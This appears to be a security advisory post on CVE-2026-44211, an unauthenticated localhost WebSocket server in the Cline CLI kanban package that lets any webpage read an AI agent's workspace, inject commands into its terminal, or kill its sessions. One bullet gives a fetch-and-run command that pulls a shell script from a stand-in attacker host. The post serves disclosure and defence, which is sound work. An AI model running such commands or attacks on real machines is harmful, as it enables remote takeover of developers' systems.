al-ice.ai

Cline Kanban — Cross-Origin WebSocket Hijack → RCE (CVE-2026-44211)

AI CVEs by al-ice.ai Editorial

AI relevance: The kanban package bundled with Cline CLI starts a local WebSocket server with zero authentication or Origin validation, turning every Cline user's browser into a remote code execution target — simply by visiting a malicious webpage.

What happened

  • Researcher Sagilayani disclosed CVE-2026-44211 (CVSS 9.3) via GitHub Security Advisory GHSA-5c57-rqjx-35g2.
  • The kanban npm package (github.com/cline/kanban) binds a WebSocket server to 127.0.0.1:3484 when the Cline CLI is invoked with --kanban.
  • Three endpoints are exposed without authentication: /api/runtime/ws, /api/terminal/io, and /api/terminal/control.
  • WebSocket connections are not subject to browser CORS — any webpage can silently connect to localhost.
  • On connection, the runtime endpoint immediately streams a full workspace snapshot: filesystem paths, git branches, task titles, and live AI agent chat messages.
  • The terminal I/O endpoint writes raw bytes directly into the agent's PTY — an attacker can inject curl https://attacker.com/shell.sh | bash and the agent executes it.
  • The control endpoint accepts {"type": "stop"} to kill any active agent session (denial of service).
  • Confirmed across macOS, Linux, and Windows on Firefox, Chrome, and Arc.
  • Root causes: CWE-306 (Missing Authentication) and CWE-1385 (Missing Origin Validation in WebSockets).

Why it matters

This is a textbook supply-chain risk: a convenience package (kanban UI for tracking agent tasks) becomes a persistent localhost backdoor. The attack requires only that the victim run Cline with kanban enabled and browse the web — no clicks, no downloads. Every developer using Cline in this configuration is effectively running an unauthenticated command server on their machine. No patched version exists at time of writing.

What to do

  • Disable the kanban server if you don't actively use it: avoid cline --kanban until a fix ships.
  • If you need kanban, run it in a network-isolated environment (no untrusted browser tabs open).
  • Watch the GitHub advisory for a patched release.
  • Security teams: add 127.0.0.1:3484 to your local service monitoring and alert if unexpected listeners appear on developer workstations.